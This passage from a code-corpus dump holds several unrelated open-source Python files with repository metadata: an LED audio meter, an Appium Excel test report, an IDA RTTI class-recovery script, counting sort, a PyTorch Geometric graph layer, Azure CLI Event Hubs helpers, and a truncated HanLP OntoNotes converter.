top = n_pixels + 1 # Allow dot to go slightly off scale
peak = 0 # Used for falling dot
dot_count = 0 # Frame counter for delaying dot-falling speed
vol_count = 0 # Frame counter for storing past volume data
lvl = 10 # Current "dampened" audio level
min_level_avg = 0 # For dynamic adjustment of graph low & high
max_level_avg = 512
# Collection of prior volume samples
vol = array.array('H', [0] * samples)
mic_pin = AnalogIn(board.A1)
strip = neopixel.NeoPixel(led_pin, n_pixels, brightness=.1, auto_write=True)
def remap_range(value, leftMin, leftMax, rightMin, rightMax):
# this remaps a value from original (left) range to new (right) range
# Figure out how 'wide' each range is
leftSpan = leftMax - leftMin
rightSpan = rightMax - rightMin
# Convert the left range into a 0-1 range (int)
valueScaled = int(value - leftMin) / int(leftSpan)
# Convert the 0-1 range into a value in the right range.
return int(rightMin + (valueScaled * rightSpan))
while True:
n = int((mic_pin.value / 65536) * 1000) # 10-bit ADC format
n = abs(n - 512 - dc_offset) # Center on zero
if n >= noise: # Remove noise/hum
n = n - noise
# "Dampened" reading (else looks twitchy) - divide by 8 (2^3)
lvl = int(((lvl * 7) + n) / 8)
# Calculate bar height based on dynamic min/max levels (fixed point):
height = top * (lvl - min_level_avg) / (max_level_avg - min_level_avg)
# Clip output
if height < 0:
height = 0
elif height > top:
height = top
# Keep 'peak' dot at top
if height > peak:
peak = height
# Color pixels based on rainbow gradient
for i in range(0, len(strip)):
if i >= height:
strip[i] = [0, 0, 0]
else:
strip[i] = colorwheel(remap_range(i, 0, (n_pixels - 1), 30, 150))
# Save sample for dynamic leveling
vol[vol_count] = n
# Advance/rollover sample counter
vol_count += 1
if vol_count >= samples:
vol_count = 0
# Get volume range of prior frames
min_level = vol[0]
max_level = vol[0]
for i in range(1, len(vol)):
if vol[i] < min_level:
min_level = vol[i]
elif vol[i] > max_level:
max_level = vol[i]
# minlvl and maxlvl indicate the volume range over prior frames, used
# for vertically scaling the output graph (so it looks interesting
# regardless of volume level). If they're too close together though
# (e.g. at very low volume levels) the graph becomes super coarse
# and 'jumpy'...so keep some minimum distance between them (this
# also lets the graph go to zero when no sound is playing):
if (max_level - min_level) < top:
max_level = min_level + top
# Dampen min/max levels - divide by 64 (2^6)
min_level_avg = (min_level_avg * 63 + min_level) >> 6
# fake rolling average - divide by 64 (2^6)
max_level_avg = (max_level_avg * 63 + max_level) >> 6
print(n)
|
2c1789e9c83a887791e46934ce3557f383820348
|
307bfc6322390e0ba2703e486cbd511de1be3b72
|
/Base/BaseExcel.py
|
3e6cf9d514a3f775d3dfce769fee9b8afadbf5b5
|
[] |
no_license
|
Lemonzhulixin/python-appium
|
f646b5bbe7771da818f90ac5ff46ea82fc284eec
|
c5df4773b6bdbdbf13282c485bf4ed11d87e3614
|
refs/heads/master
| 2022-06-23T21:46:27.162099
| 2022-06-13T02:41:43
| 2022-06-13T02:41:43
| 145,664,879
| 183
| 72
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,080
|
py
|
BaseExcel.py
|
import xlsxwriter
import os
PATH = lambda p: os.path.abspath(
os.path.join(os.path.dirname(__file__), p)
)
class OperateReport:
def __init__(self, wd):
self.wd = wd
def init(self, worksheet, data, devices):
# 设置列行的宽高
worksheet.set_column("A:A", 15)
worksheet.set_column("B:B", 20)
worksheet.set_column("C:C", 20)
worksheet.set_column("D:D", 20)
worksheet.set_column("E:E", 20)
worksheet.set_row(1, 30)
worksheet.set_row(2, 30)
worksheet.set_row(3, 30)
worksheet.set_row(4, 30)
worksheet.set_row(5, 30)
worksheet.set_row(6, 30)
worksheet.set_row(7, 30)
worksheet.set_row(8, 30)
define_format_H1 = get_format(self.wd, {'bold': True, 'font_size': 18})
define_format_H2 = get_format(self.wd, {'bold': True, 'font_size': 14})
define_format_H1.set_border(1)
define_format_H2.set_border(1)
define_format_H1.set_align("center")
define_format_H2.set_align("center")
define_format_H2.set_bg_color("blue")
define_format_H2.set_color("#ffffff")
worksheet.merge_range('A1:E1', '测试报告总概况', define_format_H1)
worksheet.merge_range('A2:E2', '测试用例执行报告汇总', define_format_H2)
_write_center(worksheet, "A3", '名称', self.wd)
_write_center(worksheet, "A4", '包名', self.wd)
_write_center(worksheet, "A5", '版本号', self.wd)
_write_center(worksheet, "A6", '测试日期', self.wd)
_write_center(worksheet, "B3", data['appName'], self.wd)
_write_center(worksheet, "B4", data['packageName'], self.wd)
_write_center(worksheet, "B5", data['appVersion'], self.wd)
_write_center(worksheet, "B6", data['testDate'], self.wd)
_write_center(worksheet, "C3", "用例总数", self.wd)
_write_center(worksheet, "C4", "通过总数", self.wd)
_write_center(worksheet, "C5", "失败总数", self.wd)
_write_center(worksheet, "C6", "测试耗时", self.wd)
_write_center(worksheet, "D3", data['sum'], self.wd)
_write_center(worksheet, "D4", data['pass'], self.wd)
_write_center(worksheet, "D5", data['fail'], self.wd)
_write_center(worksheet, "D6", data['testSumDate'], self.wd)
_write_center(worksheet, "E3", "脚本语言", self.wd)
worksheet.merge_range('E4:E6', 'appium1.8 + python3', get_format_center(self.wd))
_write_center(worksheet, "A8", '机型', self.wd)
_write_center(worksheet, "B8", '通过', self.wd)
_write_center(worksheet, "C8", '失败', self.wd)
temp = 9
for item in devices:
_write_center(worksheet, "A%s" % temp, item["phone_name"], self.wd)
_write_center(worksheet, "B%s" % temp, item["pass"], self.wd)
_write_center(worksheet, "C%s" % temp, item["fail"], self.wd)
temp = temp + 1
pie(self.wd, worksheet)
def detail(self, worksheet, info):
# 设置列行的宽高
worksheet.set_column("A:A", 30)
worksheet.set_column("B:B", 20)
worksheet.set_column("C:C", 20)
worksheet.set_column("D:D", 20)
worksheet.set_column("E:E", 20)
worksheet.set_column("F:F", 20)
worksheet.set_column("G:G", 20)
worksheet.set_column("H:H", 20)
worksheet.set_column("I:I", 20)
worksheet.set_column("J:J", 20)
worksheet.set_row(1, 30)
worksheet.set_row(2, 30)
worksheet.set_row(3, 30)
worksheet.set_row(4, 30)
worksheet.set_row(5, 30)
worksheet.set_row(6, 30)
worksheet.set_row(7, 30)
worksheet.set_row(8, 30)
worksheet.set_row(9, 30)
worksheet.set_row(10, 30)
worksheet.merge_range('A1:J1', '测试详情', get_format(self.wd, {'bold': True, 'font_size': 18, 'align': 'center',
'valign': 'vcenter', 'bg_color': 'blue',
'font_color': '#ffffff'}))
_write_center(worksheet, "A2", '机型', self.wd)
_write_center(worksheet, "B2", '用例ID', self.wd)
_write_center(worksheet, "C2", '用例介绍', self.wd)
_write_center(worksheet, "D2", '用例函数', self.wd)
_write_center(worksheet, "E2", '前置条件', self.wd)
_write_center(worksheet, "F2", '操作步骤 ', self.wd)
_write_center(worksheet, "G2", '检查点 ', self.wd)
_write_center(worksheet, "H2", '测试结果 ', self.wd)
_write_center(worksheet, "I2", '备注 ', self.wd)
_write_center(worksheet, "J2", '截图', self.wd)
temp = 3
for item in info:
# print(item)
_write_center(worksheet, "A" + str(temp), item["phoneName"], self.wd)
_write_center(worksheet, "B" + str(temp), item["id"], self.wd)
_write_center(worksheet, "C" + str(temp), item["title"], self.wd)
_write_center(worksheet, "D" + str(temp), item["caseName"], self.wd)
_write_center(worksheet, "E" + str(temp), item["info"], self.wd)
_write_center(worksheet, "F" + str(temp), item["step"], self.wd)
_write_center(worksheet, "G" + str(temp), item["checkStep"], self.wd)
_write_center(worksheet, "H" + str(temp), item["result"], self.wd)
_write_center(worksheet, "I" + str(temp), item.get("msg", ""), self.wd)
if item.get("img", "false") == "false":
_write_center(worksheet, "J" + str(temp), "", self.wd)
worksheet.set_row(temp, 30)
else:
worksheet.insert_image('J' + str(temp), item["img"],
{'x_scale': 0.1, 'y_scale': 0.1, 'border': 1})
worksheet.set_row(temp - 1, 110)
temp = temp + 1
def close(self):
self.wd.close()
def get_format(wd, option={}):
return wd.add_format(option)
# def link_format(wd):
# red_format = wd.add_format({
# 'font_color': 'red',
# 'bold': 1,
# 'underline': 1,
# 'font_size': 12,
# })
def get_format_center(wd, num=1):
return wd.add_format({'align': 'center', 'valign': 'vcenter', 'border': num})
def set_border_(wd, num=1):
return wd.add_format({}).set_border(num)
def _write_center(worksheet, cl, data, wd):
return worksheet.write(cl, data, get_format_center(wd))
def set_row(worksheet, num, height):
worksheet.set_row(num, height)
# 生成饼形图
def pie(workbook, worksheet):
chart1 = workbook.add_chart({'type': 'pie'})
chart1.add_series({
'name': '自动化测试统计',
'categories': '=测试总况!$C$4:$C$5',
'values': '=测试总况!$D$4:$D$5',
})
chart1.set_title({'name': '测试统计'})
chart1.set_style(10)
worksheet.insert_chart('A9', chart1, {'x_offset': 25, 'y_offset': 10})
if __name__ == '__main__':
pass
|
ca32d3d304a3dfab68b5c8e43c99adf893702f53
|
44ca5dc8a807b3b59df201559a68ec9eacdcaef0
|
/classinformer.py
|
a985097c5acf324894280919890215a2746ad077
|
[
"Zlib"
] |
permissive
|
nccgroup/SusanRTTI
|
fdf6733de906703e89c1fda713f4242b3f4741df
|
a0baf99937cd82bedaa9dbae98bfd370eb49cdf3
|
refs/heads/master
| 2023-08-09T18:15:27.851029
| 2023-06-28T21:41:09
| 2023-06-28T21:41:09
| 105,178,389
| 179
| 40
|
NOASSERTION
| 2023-07-22T20:09:52
| 2017-09-28T17:26:14
|
Python
|
UTF-8
|
Python
| false
| false
| 890
|
py
|
classinformer.py
|
# ClassInformer python
# Nicolas Guigo / NCC Group
# Tyler Colgan / NCC Group
# 03/2017
import idaapi
from idc import *
from ida_search import find_text
idaapi.require("utils")
idaapi.require("msvc")
idaapi.require("gcc")
idaapi.require("classdiagram")
from idaapi import auto_is_ok
from msvc import run_msvc
from gcc import run_gcc
from classdiagram import ClassDiagram
def show_classes(classes):
c = ClassDiagram("Class Diagram", classes)
c.Show()
def isGcc():
gcc_info = find_text(0x0, 0, 0, "N10__cxxabiv117__class_type_infoE", SEARCH_CASE|SEARCH_DOWN)
return gcc_info != BADADDR
def main():
print("Starting ClassInformerPython")
if auto_is_ok():
classes = run_gcc() if isGcc() else run_msvc()
print(classes)
show_classes(classes)
else:
print("Take it easy, man")
print("Done")
if __name__ == '__main__':
main()
|
ac06fe0740906ee537aa219f0b01324bddccd481
|
9ed4d46aedd4d4acadb48d610e940594b5b7b3fd
|
/sorts/counting_sort.py
|
256952df52d2e520d6a9ce8f70f84ff667085976
|
[
"MIT"
] |
permissive
|
TheAlgorithms/Python
|
7596a0e236ed12a61f9db19a7ea68309779cc85b
|
421ace81edb0d9af3a173f4ca7e66cc900078c1d
|
refs/heads/master
| 2023-09-01T17:32:20.190949
| 2023-08-29T13:18:10
| 2023-08-29T13:18:10
| 63,476,337
| 184,217
| 48,615
|
MIT
| 2023-09-14T02:05:29
| 2016-07-16T09:44:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,265
|
py
|
counting_sort.py
|
"""
This is pure Python implementation of counting sort algorithm
For doctests run following command:
python -m doctest -v counting_sort.py
or
python3 -m doctest -v counting_sort.py
For manual testing run:
python counting_sort.py
"""
def counting_sort(collection):
"""Pure implementation of counting sort algorithm in Python
:param collection: some mutable ordered collection with heterogeneous
comparable items inside
:return: the same collection ordered by ascending
Examples:
>>> counting_sort([0, 5, 3, 2, 2])
[0, 2, 2, 3, 5]
>>> counting_sort([])
[]
>>> counting_sort([-2, -5, -45])
[-45, -5, -2]
"""
# if the collection is empty, returns empty
if collection == []:
return []
# get some information about the collection
coll_len = len(collection)
coll_max = max(collection)
coll_min = min(collection)
# create the counting array
counting_arr_length = coll_max + 1 - coll_min
counting_arr = [0] * counting_arr_length
# count how much a number appears in the collection
for number in collection:
counting_arr[number - coll_min] += 1
# sum each position with it's predecessors. now, counting_arr[i] tells
# us how many elements <= i has in the collection
for i in range(1, counting_arr_length):
counting_arr[i] = counting_arr[i] + counting_arr[i - 1]
# create the output collection
ordered = [0] * coll_len
# place the elements in the output, respecting the original order (stable
# sort) from end to begin, updating counting_arr
for i in reversed(range(coll_len)):
ordered[counting_arr[collection[i] - coll_min] - 1] = collection[i]
counting_arr[collection[i] - coll_min] -= 1
return ordered
def counting_sort_string(string):
"""
>>> counting_sort_string("thisisthestring")
'eghhiiinrsssttt'
"""
return "".join([chr(i) for i in counting_sort([ord(c) for c in string])])
if __name__ == "__main__":
# Test string sort
assert counting_sort_string("thisisthestring") == "eghhiiinrsssttt"
user_input = input("Enter numbers separated by a comma:\n").strip()
unsorted = [int(item) for item in user_input.split(",")]
print(counting_sort(unsorted))
|
aeabc32bdc2da1c283858884b78a1f44022f794d
|
9f84d91a8ae3df53b07fe3267992fba00a99ac9e
|
/torch_geometric/nn/conv/wl_conv_continuous.py
|
f74946060f91e4f639a0984358333be8b92a5d29
|
[
"MIT"
] |
permissive
|
pyg-team/pytorch_geometric
|
ebea601eae228f3905465b5c2349d3fb3bb5cb26
|
a52af694b8ce6a80811e20966fe6d08a3e7511fe
|
refs/heads/master
| 2023-08-31T04:13:40.943308
| 2023-08-30T12:48:42
| 2023-08-30T12:48:42
| 106,024,057
| 6,775
| 1,563
|
MIT
| 2023-09-14T17:10:18
| 2017-10-06T16:03:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,349
|
py
|
wl_conv_continuous.py
|
from typing import Union
from torch import Tensor
from torch_geometric.nn.conv import MessagePassing
from torch_geometric.typing import OptPairTensor, OptTensor, Size
from torch_geometric.utils import scatter
class WLConvContinuous(MessagePassing):
r"""The Weisfeiler Lehman operator from the `"Wasserstein
Weisfeiler-Lehman Graph Kernels" <https://arxiv.org/abs/1906.01277>`_
paper. Refinement is done though a degree-scaled mean aggregation and
works on nodes with continuous attributes:
.. math::
\mathbf{x}^{\prime}_i = \frac{1}{2}\big(\mathbf{x}_i +
\frac{1}{\textrm{deg}(i)}
\sum_{j \in \mathcal{N}(i)} e_{j,i} \cdot \mathbf{x}_j \big)
where :math:`e_{j,i}` denotes the edge weight from source node :obj:`j` to
target node :obj:`i` (default: :obj:`1`)
Args:
**kwargs (optional): Additional arguments of
:class:`torch_geometric.nn.conv.MessagePassing`.
Shapes:
- **input:**
node features :math:`(|\mathcal{V}|, F)` or
:math:`((|\mathcal{V_s}|, F), (|\mathcal{V_t}|, F))` if bipartite,
edge indices :math:`(2, |\mathcal{E}|)`,
edge weights :math:`(|\mathcal{E}|)` *(optional)*
- **output:** node features :math:`(|\mathcal{V}|, F)` or
:math:`(|\mathcal{V}_t|, F)` if bipartite
"""
def __init__(self, **kwargs):
super().__init__(aggr='add', **kwargs)
def forward(self, x: Union[Tensor, OptPairTensor], edge_index: Tensor,
edge_weight: OptTensor = None, size: Size = None) -> Tensor:
if isinstance(x, Tensor):
x: OptPairTensor = (x, x)
if edge_weight is None:
edge_weight = x[0].new_ones(edge_index.size(1))
# propagate_type: (x: OptPairTensor, edge_weight: Tensor)
out = self.propagate(edge_index, x=x, edge_weight=edge_weight,
size=size)
deg = scatter(edge_weight, edge_index[1], 0, out.size(0), reduce='sum')
deg_inv = 1. / deg
deg_inv.masked_fill_(deg_inv == float('inf'), 0)
out = deg_inv.view(-1, 1) * out
x_dst = x[1]
if x_dst is not None:
out = 0.5 * (x_dst + out)
return out
def message(self, x_j: Tensor, edge_weight: Tensor) -> Tensor:
return edge_weight.view(-1, 1) * x_j
|
b71721891c8321374aa3efccf187d777498d9a83
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/eventhubs/operations/app_group_custom_file.py
|
9f70434d00883b2408ecbc978b1a3ac13c440ab5
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 3,924
|
py
|
app_group_custom_file.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
def create_app_group_policy_object(col):
policy_object = {}
policy_object.update({
"name": col["name"],
"type": "ThrottlingPolicy",
})
if "rateLimitThreshold" in col and "metricId" in col:
policy_object.update({
"throttling_policy": {
"rate_limit_threshold": col["rateLimitThreshold"],
"metric_id": col["metricId"]
}
})
return policy_object
def cli_appgroup_create(cmd, resource_group_name, namespace_name, application_group_name, client_app_group_identifier,
throttling_policy_config=None, is_enabled=None):
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Create
command_args_dict = {}
command_args_dict.update({
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name,
"is_enabled": is_enabled,
"client_app_group_identifier": client_app_group_identifier,
"policies": throttling_policy_config
})
return Create(cli_ctx=cmd.cli_ctx)(command_args=command_args_dict)
def cli_add_appgroup_policy(cmd, resource_group_name, namespace_name, application_group_name, throttling_policy_config):
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Update
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Show
application_group = Show(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name
})
policy_object = []
for obj in application_group["policies"]:
policy = create_app_group_policy_object(obj)
policy_object.append(policy)
for obj in throttling_policy_config:
if obj not in policy_object:
policy_object.append(obj)
return Update(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name,
"policies": policy_object
})
def cli_remove_appgroup_policy(cmd, resource_group_name, namespace_name, application_group_name, policy):
from azure.cli.core.azclierror import ResourceNotFoundError
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Update
from azure.cli.command_modules.eventhubs.aaz.latest.eventhubs.namespace.application_group import Show
application_group = Show(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name
})
policy_object = []
for i in policy:
semaphor = 0
for j in application_group["policies"]:
if i["name"] == j["name"]:
application_group["policies"].remove(j)
semaphor = 1
if semaphor == 0:
raise ResourceNotFoundError('The following policy was not found: Name: ' + i["name"])
for col in application_group["policies"]:
policy_object.append(create_app_group_policy_object(col))
return Update(cli_ctx=cmd.cli_ctx)(command_args={
"resource_group": resource_group_name,
"namespace_name": namespace_name,
"application_group_name": application_group_name,
"policies": policy_object
})
|
947a2a8704638984f37bdbc7d793821aeca4ab19
|
dd221d1ab80a49190a0c93277e2471debaa2db95
|
/hanlp/datasets/srl/ontonotes5/_utils.py
|
43fc05752f302236188cece0cf4cea27deaf437d
|
[
"Apache-2.0",
"CC-BY-NC-SA-4.0"
] |
permissive
|
hankcs/HanLP
|
29a22d4e240617e4dc67929c2f9760a822402cf7
|
be2f04905a12990a527417bd47b79b851874a201
|
refs/heads/doc-zh
| 2023-08-18T12:48:43.533453
| 2020-02-15T17:19:28
| 2023-03-14T02:46:03
| 24,976,755
| 32,454
| 9,770
|
Apache-2.0
| 2023-08-13T03:11:39
| 2014-10-09T06:36:16
|
Python
|
UTF-8
|
Python
| false
| false
| 25,086
|
py
|
_utils.py
|
#!/usr/bin/env python
import codecs
import collections
import glob
import json
import os
import re
import sys
from pprint import pprint
from typing import List, Dict, Union
from hanlp_common.io import eprint, save_json
from hanlp.common.transform import NormalizeToken
from hanlp.datasets.parsing.loaders._ctb_utils import remove_all_ec, convert_to_dependency
from hanlp.datasets.parsing.ptb import PTB_TOKEN_MAPPING
from hanlp.utils.io_util import merge_files, get_resource, pushd, run_cmd, read_tsv_as_sents, replace_ext, \
get_exitcode_stdout_stderr
from hanlp.utils.log_util import flash
BEGIN_DOCUMENT_REGEX = re.compile(r"#begin document \((.*)\); part (\d+)")
def flatten(l):
return [item for sublist in l for item in sublist]
def get_doc_key(doc_id, part):
return "{}_{}".format(doc_id, int(part))
class DocumentState(object):
def __init__(self):
self.doc_key = None
self.text = []
self.text_speakers = []
self.speakers = []
self.sentences = []
self.pos = []
self.lemma = []
self.pos_buffer = []
self.lemma_buffer = []
self.constituents = [] # {}
self.const_stack = []
self.const_buffer = []
self.ner = []
self.ner_stack = []
self.ner_buffer = []
self.srl = []
self.argument_stacks = []
self.argument_buffers = []
self.predicate_buffer = []
self.clusters = collections.defaultdict(list)
self.coref_stacks = collections.defaultdict(list)
def assert_empty(self):
assert self.doc_key is None
assert len(self.text) == 0
assert len(self.text_speakers) == 0
assert len(self.speakers) == 0
assert len(self.sentences) == 0
assert len(self.srl) == 0
assert len(self.predicate_buffer) == 0
assert len(self.argument_buffers) == 0
assert len(self.argument_stacks) == 0
assert len(self.constituents) == 0
assert len(self.const_stack) == 0
assert len(self.const_buffer) == 0
assert len(self.ner) == 0
assert len(self.lemma_buffer) == 0
assert len(self.pos_buffer) == 0
assert len(self.ner_stack) == 0
assert len(self.ner_buffer) == 0
assert len(self.coref_stacks) == 0
assert len(self.clusters) == 0
def assert_finalizable(self):
assert self.doc_key is not None
assert len(self.text) == 0
assert len(self.text_speakers) == 0
assert len(self.speakers) > 0
assert len(self.sentences) > 0
assert len(self.constituents) > 0
assert len(self.const_stack) == 0
assert len(self.ner_stack) == 0
assert len(self.predicate_buffer) == 0
assert all(len(s) == 0 for s in list(self.coref_stacks.values()))
def finalize_sentence(self):
self.sentences.append(tuple(self.text))
del self.text[:]
self.lemma.append(tuple(self.lemma_buffer))
del self.lemma_buffer[:]
self.pos.append(tuple(self.pos_buffer))
del self.pos_buffer[:]
self.speakers.append(tuple(self.text_speakers))
del self.text_speakers[:]
assert len(self.predicate_buffer) == len(self.argument_buffers)
self.srl.append([])
for pred, args in zip(self.predicate_buffer, self.argument_buffers):
for start, end, label in args:
self.srl[-1].append((pred, start, end, label))
self.predicate_buffer = []
self.argument_buffers = []
self.argument_stacks = []
self.constituents.append([c for c in self.const_buffer])
self.const_buffer = []
self.ner.append([c for c in self.ner_buffer])
self.ner_buffer = []
def finalize(self):
merged_clusters = []
for c1 in list(self.clusters.values()):
existing = None
for m in c1:
for c2 in merged_clusters:
if m in c2:
existing = c2
break
if existing is not None:
break
if existing is not None:
print("Merging clusters (shouldn't happen very often.)")
existing.update(c1)
else:
merged_clusters.append(set(c1))
merged_clusters = [list(c) for c in merged_clusters]
all_mentions = flatten(merged_clusters)
assert len(all_mentions) == len(set(all_mentions))
assert len(self.sentences) == len(self.srl)
assert len(self.sentences) == len(self.constituents)
assert len(self.sentences) == len(self.ner)
return {
"doc_key": self.doc_key,
"sentences": self.sentences,
"lemma": self.lemma,
"pos": self.pos,
"speakers": self.speakers,
"srl": self.srl,
"constituents": self.constituents,
"ner": self.ner,
"clusters": merged_clusters
}
def filter_data(input_json_file, output_json_file, doc_ids_file=None, annotation=None):
"""Filter OntoNotes5 data based on CoNLL2012 (coref) doc ids.
https://github.com/bcmi220/unisrl/blob/master/scripts/filter_conll2012_data.py
Args:
input_json_file: All documents.
output_json_file:
doc_ids_file:
Returns:
"""
assert doc_ids_file or annotation
doc_count = 0
sentence_count = 0
srl_count = 0
ner_count = 0
cluster_count = 0
word_count = 0
missing_count = 0
doc_ids = []
doc_ids_to_keys = collections.defaultdict(list)
filtered_examples = {}
ontonotes_root = os.path.abspath(os.path.join(os.path.dirname(input_json_file), *['..'] * 2))
language = os.path.basename(input_json_file).split('.')[1]
if doc_ids_file:
with open(doc_ids_file, "r") as f:
for line in f:
doc_id = line.strip().split("annotations/")[1]
doc_ids.append(doc_id)
doc_ids_to_keys[doc_id] = []
f.close()
with codecs.open(input_json_file, "r", "utf8") as f:
for jsonline in f:
example = json.loads(jsonline)
doc_key = example["doc_key"]
dk_prefix = "_".join(doc_key.split("_")[:-1])
if doc_ids_file and dk_prefix not in doc_ids_to_keys:
continue
if annotation and not os.path.isfile(
os.path.join(ontonotes_root, 'data/files/data', language, 'annotations', dk_prefix) + annotation):
print(os.path.join(ontonotes_root, 'data/files/data', language, 'annotations', dk_prefix) + annotation)
missing_count += 1
continue
doc_ids_to_keys[dk_prefix].append(doc_key)
filtered_examples[doc_key] = example
sentences = example["sentences"]
word_count += sum([len(s) for s in sentences])
sentence_count += len(sentences)
srl_count += sum([len(srl) for srl in example["srl"]])
ner_count += sum([len(ner) for ner in example["ner"]])
coref = example["clusters"]
cluster_count += len(coref)
doc_count += 1
f.close()
print(("Documents: {}\nSentences: {}\nWords: {}\nNER: {}, PAS: {}, Clusters: {}, No annotations: {}".format(
doc_count, sentence_count, word_count, ner_count, srl_count, cluster_count, missing_count)))
if doc_ids_file:
with codecs.open(output_json_file, "w", "utf8") as f:
for doc_id in doc_ids: # Arrange the files in order of id files
for key in doc_ids_to_keys[doc_id]:
f.write(json.dumps(filtered_examples[key], ensure_ascii=False))
f.write("\n")
f.close()
else:
with codecs.open(output_json_file, "w", "utf8") as f:
for doc in filtered_examples.values():
f.write(json.dumps(doc, ensure_ascii=False))
f.write("\n")
f.close()
def normalize_word(word, language):
if language == "arabic":
word = word[:word.find("#")]
if word == "/." or word == "/?":
return word[1:]
else:
return word
def handle_bit(word_index, bit, stack, spans, label_set):
asterisk_idx = bit.find("*")
if asterisk_idx >= 0:
open_parens = bit[:asterisk_idx]
close_parens = bit[asterisk_idx + 1:]
else:
open_parens = bit[:-1]
close_parens = bit[-1]
current_idx = open_parens.find("(")
while current_idx >= 0:
next_idx = open_parens.find("(", current_idx + 1)
if next_idx >= 0:
label = open_parens[current_idx + 1:next_idx]
else:
label = open_parens[current_idx + 1:]
label_set.add(label)
stack.append((word_index, label))
current_idx = next_idx
for c in close_parens:
try:
assert c == ")"
except AssertionError:
print(word_index, bit, spans, stack)
continue
open_index, label = stack.pop()
spans.append((open_index, word_index, label))
''' current_span = (open_index, word_index)
if current_span in spans:
spans[current_span] += "_" + label
else:
spans[current_span] = label
spans[current_span] = label '''
def handle_line(line, document_state: DocumentState, language, labels, stats):
begin_document_match = re.match(BEGIN_DOCUMENT_REGEX, line)
if begin_document_match:
document_state.assert_empty()
document_state.doc_key = get_doc_key(begin_document_match.group(1), begin_document_match.group(2))
return None
elif line.startswith("#end document"):
document_state.assert_finalizable()
finalized_state = document_state.finalize()
stats["num_clusters"] += len(finalized_state["clusters"])
stats["num_mentions"] += sum(len(c) for c in finalized_state["clusters"])
# labels["{}_const_labels".format(language)].update(l for _, _, l in finalized_state["constituents"])
# labels["ner"].update(l for _, _, l in finalized_state["ner"])
return finalized_state
else:
row = line.split()
# Starting a new sentence.
if len(row) == 0:
stats["max_sent_len_{}".format(language)] = max(len(document_state.text),
stats["max_sent_len_{}".format(language)])
stats["num_sents_{}".format(language)] += 1
document_state.finalize_sentence()
return None
assert len(row) >= 12
doc_key = get_doc_key(row[0], row[1])
word = normalize_word(row[3], language)
pos = row[4]
parse = row[5]
lemma = row[6]
predicate_sense = row[7]
speaker = row[9]
ner = row[10]
args = row[11:-1]
coref = row[-1]
word_index = len(document_state.text) + sum(len(s) for s in document_state.sentences)
document_state.text.append(word)
document_state.text_speakers.append(speaker)
document_state.pos_buffer.append(pos)
document_state.lemma_buffer.append(lemma)
handle_bit(word_index, parse, document_state.const_stack, document_state.const_buffer, labels["categories"])
handle_bit(word_index, ner, document_state.ner_stack, document_state.ner_buffer, labels["ner"])
if len(document_state.argument_stacks) < len(args):
document_state.argument_stacks = [[] for _ in args]
document_state.argument_buffers = [[] for _ in args]
for i, arg in enumerate(args):
handle_bit(word_index, arg, document_state.argument_stacks[i], document_state.argument_buffers[i],
labels["srl"])
if predicate_sense != "-":
document_state.predicate_buffer.append(word_index)
if coref != "-":
for segment in coref.split("|"):
if segment[0] == "(":
if segment[-1] == ")":
cluster_id = int(segment[1:-1])
document_state.clusters[cluster_id].append((word_index, word_index))
else:
cluster_id = int(segment[1:])
document_state.coref_stacks[cluster_id].append(word_index)
else:
cluster_id = int(segment[:-1])
start = document_state.coref_stacks[cluster_id].pop()
document_state.clusters[cluster_id].append((start, word_index))
return None
def ontonotes_document_generator(input_path, language, labels, stats):
with open(input_path, "r") as input_file:
document_state = DocumentState()
for line in input_file.readlines():
document = handle_line(line, document_state, language, labels, stats)
if document is not None:
yield document
document_state = DocumentState()
def convert_to_jsonlines(input_path, output_path, language, labels=None, stats=None):
if labels is None:
labels = collections.defaultdict(set)
if stats is None:
stats = collections.defaultdict(int)
count = 0
with open(output_path, "w") as output_file:
for document in ontonotes_document_generator(input_path, language, labels, stats):
output_file.write(json.dumps(document, ensure_ascii=False))
output_file.write("\n")
count += 1
return labels, stats
def make_ontonotes_jsonlines(conll12_ontonotes_path, output_path, languages=None):
if languages is None:
languages = ['english', 'chinese', 'arabic']
for language in languages:
make_ontonotes_language_jsonlines(conll12_ontonotes_path, output_path, language)
def make_ontonotes_language_jsonlines(conll12_ontonotes_path, output_path=None, language='english'):
conll12_ontonotes_path = get_resource(conll12_ontonotes_path)
if output_path is None:
output_path = os.path.dirname(conll12_ontonotes_path)
for split in ['train', 'development', 'test']:
pattern = f'{conll12_ontonotes_path}/data/{split}/data/{language}/annotations/*/*/*/*gold_conll'
files = sorted(glob.glob(pattern, recursive=True))
assert files, f'No gold_conll files found in {pattern}'
version = os.path.basename(files[0]).split('.')[-1].split('_')[0]
if version.startswith('v'):
assert all([version in os.path.basename(f) for f in files])
else:
version = 'v5'
lang_dir = f'{output_path}/{language}'
if split == 'conll-2012-test':
split = 'test'
full_file = f'{lang_dir}/{split}.{language}.{version}_gold_conll'
